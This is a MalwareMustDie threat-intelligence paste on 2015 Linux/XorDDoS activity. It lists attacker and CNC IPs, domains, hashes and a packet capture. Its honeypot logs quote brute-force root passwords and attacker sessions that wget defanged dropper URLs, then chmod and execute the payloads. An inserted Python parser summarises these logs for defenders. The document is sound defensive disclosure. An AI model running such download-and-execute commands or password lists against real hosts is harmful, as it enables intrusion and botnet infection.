- // ------------------------
- // Background:
- // ------------------------
- XOR.DDOS attack recorded from June 22nd 2015 to Sept 15 2015
- By #MalwareMustDie - @unixfreaxjp
- Additional/updates to the XOR.DDOS case reported:
- MMD-0033-2015 Linux/XorDDoS infection incident report (CNC: HOSTASA.ORG)
- http://blog.malwaremustdie.org/2015/06/mmd-0033-2015-linuxxorddos-infection_23.html
- MalwareMustDie references on XOR.DDoS:
- http://blog.malwaremustdie.org/2015/07/mmd-0037-2015-bad-shellshock.html
- http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html
- POINT: Hong Kong and United States CNCs are still actively being used.
- // ------------------------
- // Cumulative attacker IPs:
- // ------------------------
- 43.229.52.79
- 43.229.53.28
- 43.229.53.49
- 43.229.53.63
- 43.229.53.88
- 43.255.188.139
- 43.255.189.16
- // ------------------------
- // Sample brute login used:
- // ------------------------
- 2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
- 2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
- 2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
- 2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
- 2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
- 2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
- 2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
- 2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
- 2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
- 2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
- 2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
- 2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
- 2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
- 2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
- 2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
- 2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
- 2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
- 2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
- 2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
- 2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
- 2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
- 2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
- 2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
- 2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
- 2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
- 2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
- 2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
- 2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
- 2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
- 2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
- 2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
- 2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
- 2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
- (...)
- 2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
- 2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
- 2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]
- // ------------------------
- // Payload attacker & payload IP:
- // ------------------------
- 43.229.53.90
- // ------------------------
- // Payload downloaded by attackers log:
- // ------------------------
- 2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
- 2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
- 2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
- 2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
- 2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
- 2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
- 2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
- 2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3
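Added example (not part of the MalwareMustDie paste): a small parser for the honeypot log format quoted in the "Sample brute login used" and "Payload downloaded by attackers log" sections above. It counts login attempts and distinct passwords per source IP, pulls the defanged dropper URLs out of the "exec command" sessions, and flags any source or dropper host that is not already on the attacker IP lists in this paste. The function names, the summary layout and SAMPLE_LOG (assembled from lines quoted above, plus one deliberately malformed line) are this example's own; KNOWN_BAD is taken from the "Cumulative attacker IPs" and "Payload attacker" sections.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# One honeypot line: "<timestamp> [ip=<addr>] <rest of line>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) "
    r"\[ip=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\] (?P<body>.*)$"
)
# Brute-force record: "login attempt [user/password]"
LOGIN_RE = re.compile(r"^login attempt \[(?P<user>[^/\]]+)/(?P<pw>[^\]]*)\]$")
# The paste defangs URLs as "h00p://"; hxxp and plain http(s) are accepted too.
URL_RE = re.compile(r"\b(?:h00p|hxxp|https?)://[^\s'\"]+", re.IGNORECASE)
HOST_RE = re.compile(r"://([^/\s:]+)")


@dataclass
class Event:
    ts: str
    ip: str
    body: str


def parse_line(line):
    """Return an Event for one log line, or None if the line does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Event(m["ts"], m["ip"], m["body"])


def summarise(lines, known_bad=frozenset()):
    """Aggregate brute-force and dropper activity from honeypot log lines."""
    logins = Counter()            # source ip -> number of login attempts
    passwords = defaultdict(set)  # source ip -> distinct passwords tried
    urls = []                     # (source ip, defanged url) for each download command
    unknown_sources = set()       # source ips not on the known attacker list
    unparsed = 0
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev is None:
            unparsed += 1
            continue
        if known_bad and ev.ip not in known_bad:
            unknown_sources.add(ev.ip)
        lm = LOGIN_RE.match(ev.body)
        if lm:
            logins[ev.ip] += 1
            passwords[ev.ip].add(lm["pw"])
            continue
        for url in URL_RE.findall(ev.body):
            urls.append((ev.ip, url))
    hosts = sorted({HOST_RE.search(u).group(1) for _, u in urls})
    return {
        "logins": dict(logins),
        "distinct_passwords": {ip: len(s) for ip, s in passwords.items()},
        "download_urls": urls,
        "dropper_hosts": hosts,
        "dropper_hosts_not_known": [h for h in hosts if h not in known_bad],
        "unknown_sources": sorted(unknown_sources),
        "unparsed": unparsed,
    }


# Attacker IPs listed in this paste (cumulative attacker IPs + payload attacker IP).
KNOWN_BAD = frozenset({
    "43.229.52.79", "43.229.53.28", "43.229.53.49", "43.229.53.63",
    "43.229.53.88", "43.255.188.139", "43.255.189.16", "43.229.53.90",
})

# Constructed sample: lines copied from the paste, plus one malformed line.
SAMPLE_LOG = """\
2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
this line is not in the honeypot format and is counted as unparsed
"""

if __name__ == "__main__":
    import json
    print(json.dumps(summarise(SAMPLE_LOG.splitlines(), KNOWN_BAD), indent=2))
```

The "dropper_hosts_not_known" entry is the useful output for a defender: in the sample it surfaces 192.126.112.88, a host that serves the first payload but appears nowhere in the attacker IP lists, so it is a candidate for blocking and for a passive-DNS lookup on its own.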
- // ------------------------
- // Sample hashes (uploaded to VT):
- // ------------------------
- 142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
- 8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
- a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681
- // ------------------------
- // CNC domains, IP, DNS:
- // ------------------------
- aa.hostasa.org 23.234.60.143 // http downloads h00p://aa.hostasa.org/leg.rar (Xor-ed ELF trojan/downloader malware, prev known as "g.rar")
- ns1.hostasa.org 107.160.40.9 // cnc
- ns2.hostasa.org 103.240.140.152 // cnc
- ns3.hostasa.org 103.240.141.54 // cnc
- ns4.hostasa.org 192.126.126.64 // cnc
- ;; AUTHORITY SECTION:
- hostasa.org. 3600 IN NS ns1cnb.domain-resolution.net.
- hostasa.org. 3600 IN NS ns4lny.domain-resolution.net.
- hostasa.org. 3600 IN NS ns3cna.domain-resolution.net.
- hostasa.org. 3600 IN NS ns2dky.domain-resolution.net.
- // ------------------------
- // Infector & CNC IP routes:
- // ------------------------
- 43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
- 43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
- 43.255.189.16|| | | | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International
- 23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
- 107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
- 103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
- 103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
- 192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
- // ------------------------
- // Infector & CNC GeoIP
- // ------------------------
- 43.229.52.79, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.28, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.49, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.63, , , Hong Kong, 22.25, 114.1667, AS
- 43.229.53.88, , , Hong Kong, 22.25, 114.1667, AS
- 43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
- 43.255.189.16, , , Hong Kong, 22.25, 114.1667, AS
- 23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
- 107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
- 103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
- 103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
- 192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642
- // ------------------------
- // Just some recent PoCs:
- // ------------------------
- TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
- TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)
- TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)
- 2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143.http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
- E..6.@.@....nJ...<..l.Ps...J......tk.........#cU
- GET /leg.rar HTTP/1.1
- Accept: */*
- Accept-Language: zh-cn
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
- Host: aa.hostasa.org
- Connection: Keep-Alive
- [...]
- 2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476: Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2820891645 ecr 34190894], length 1402
- E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c.. ..
- HTTP/1.1 200 OK
- Date: Tue, 15 Sep 2015 05:54:14 GMT
- Server: Apache
- Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
- ETag: "2475-5099c15a16480"
- Accept-Ranges: bytes
- Content-Length: 9333
- Keep-Alive: timeout=5, max=2048
- Connection: Keep-Alive
- Content-Type: application/x-rar-compressed
- /&.{L9R$/8PE .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
- [...]
- #MalwareMustDie!
- [EOF]